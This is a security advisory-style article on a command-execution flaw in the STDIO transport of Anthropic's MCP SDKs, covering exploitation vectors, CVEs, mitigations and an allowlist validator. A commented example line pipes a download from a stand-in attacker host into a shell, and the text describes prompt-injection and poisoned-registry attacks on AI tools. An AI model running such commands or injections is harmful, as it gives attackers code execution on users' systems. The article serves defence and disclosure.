Critical Vulnerability in Anthropic MCP SDKs Endangers Millions with Remote Code Execution Risk

A critical vulnerability has been identified in Anthropic’s Model Context Protocol (MCP), affecting SDKs with over 150 million combined downloads and exposing up to 200,000 servers to full system takeover. The flaw, discovered by the OX Security Research team, is embedded within Anthropic’s official MCP Software Development Kits (SDKs) across multiple programming languages, including Python, TypeScript, Java, and Rust.

Unlike typical coding errors, this vulnerability is architectural, meaning that any developer building upon Anthropic’s MCP foundation inadvertently inherits the security risk. The flaw enables arbitrary command execution, a form of remote code execution (RCE), on any system running a vulnerable MCP implementation. Successful exploitation grants attackers direct access to sensitive user data, internal databases, API keys, and chat histories, effectively handing over complete control of the affected environment.

Exploitation Methods:

Researchers have identified four primary exploitation vectors:

1. Unauthenticated UI Injection: Targeting popular AI frameworks, attackers can inject malicious code without authentication.

2. Hardening Bypasses: Even in environments with enhanced security measures, such as Flowise, attackers can circumvent protections.

3. Zero-Click Prompt Injection: AI Integrated Development Environments (IDEs) like Windsurf and Cursor are susceptible to prompt injections that require no user interaction.

4. Malicious Marketplace Distribution: Out of 11 MCP registries tested, 9 were successfully compromised with malicious payloads.
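Several of these vectors reduce to the same root cause: an MCP client using the STDIO transport launches the server as a local subprocess built from configuration-supplied command and argument strings. The sketch below illustrates the mechanism in simplified form; the function and parameter names are illustrative, not taken from any Anthropic SDK.

```python
import subprocess

def launch_stdio_server(command: str, args: list[str]) -> subprocess.Popen:
    """Simplified STDIO-transport launcher: the client spawns the MCP
    server as a local subprocess and communicates over stdin/stdout.
    The spawned process runs with the host's full privileges."""
    return subprocess.Popen(
        [command, *args],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )

# If an attacker controls the configuration, they control what runs, e.g.:
# launch_stdio_server("bash", ["-c", "curl http://attacker.example/x | sh"])
```

Any channel that lets an attacker influence that configuration, whether an exposed UI, a prompt injection, or a poisoned registry entry, therefore yields command execution on the host.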

OX Security confirmed successful command execution on six live production platforms, including critical vulnerabilities in LiteLLM, LangChain, and IBM’s LangFlow. The research has led to the identification of at least 10 Common Vulnerabilities and Exposures (CVEs) across multiple high-profile projects. Several critical flaws have been patched, including CVE-2026-30623 in LiteLLM and CVE-2026-33224 in Bisheng.

Anthropic’s Response:

Despite the severity of the findings, Anthropic has described the behavior as expected and declined to implement a protocol-level patch that could have immediately protected millions of downstream users. The response comes shortly after Anthropic unveiled Claude Mythos, positioned as a tool to help secure the world’s software, underscoring the need for the company to apply Secure by Design principles to its own infrastructure.

Mitigation Strategies:

To protect your environment from potential exploitation:

– Restrict Public Access: Block public internet access to AI services connected to sensitive APIs or databases.

– Treat Inputs as Untrusted: Consider all external MCP configuration input as untrusted; block or restrict user-controlled inputs to STDIO parameters.

– Verify Sources: Install MCP servers only from verified sources, such as the official GitHub MCP Registry.

– Implement Sandboxing: Run MCP-enabled services inside sandboxes with restricted permissions.

– Monitor Activity: Monitor all tool invocations for unexpected background activity or data exfiltration attempts.

– Update Services: Immediately update all affected services to their latest patched versions.
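The second recommendation, treating configuration input as untrusted, can be enforced mechanically before any STDIO server is launched. A minimal sketch, assuming an allowlist approach; the command paths and helper name are illustrative, not part of any MCP SDK:

```python
# Hypothetical allowlist of MCP server binaries approved for this host.
ALLOWED_COMMANDS = {
    "/usr/local/bin/mcp-server-filesystem",
    "/usr/local/bin/mcp-server-git",
}

def validate_stdio_config(command: str, args: list[str]) -> None:
    """Reject any MCP STDIO configuration whose command is not on the
    pre-approved allowlist, and refuse shell metacharacters in arguments."""
    if command not in ALLOWED_COMMANDS:
        raise ValueError(f"STDIO command not allowlisted: {command!r}")
    for arg in args:
        if any(ch in arg for ch in ";|&$`"):
            raise ValueError(f"suspicious characters in argument: {arg!r}")
```

An allowlist is deliberately stricter than a denylist here: because the configuration directly determines what process runs, anything not explicitly approved should be rejected.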

OX Security has deployed platform-level detections to identify unsafe STDIO MCP configurations in customer codebases and AI-generated code.